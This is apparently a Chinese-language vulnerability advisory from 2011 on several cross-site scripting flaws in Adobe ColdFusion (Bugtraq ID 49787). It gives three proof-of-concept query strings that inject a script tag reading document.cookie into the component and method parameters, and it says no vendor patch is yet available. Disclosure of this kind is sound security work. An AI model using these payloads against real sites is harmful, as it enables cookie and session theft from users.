发布日期:2011-09-27
更新日期:2011-09-27
受影响系统:
Adobe ColdFusion
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 49787
Adobe ColdFusion是一个动态Web服务器。
Adobe ColdFusion在实现上存在多个跨站脚本执行漏洞,远程攻击者可利用这些漏洞在受影响站点执行任意脚本代码,窃取cookie身份验证凭证。
<*来源:MustLive (mustlive@websecurity.com.ua)
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
MustLive (mustlive@websecurity.com.ua)提供了如下测试方法:
?component=%3Cbody%20onload=alert(document.cookie)%3E
?method=getcfcinhtml&name=%3Cbody%20onload=alert(document.cookie)%3E
?method=%3Cbody%20onload=alert(document.cookie)%3E
建议:
--------------------------------------------------------------------------------
厂商补丁:
Adobe
-----
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本: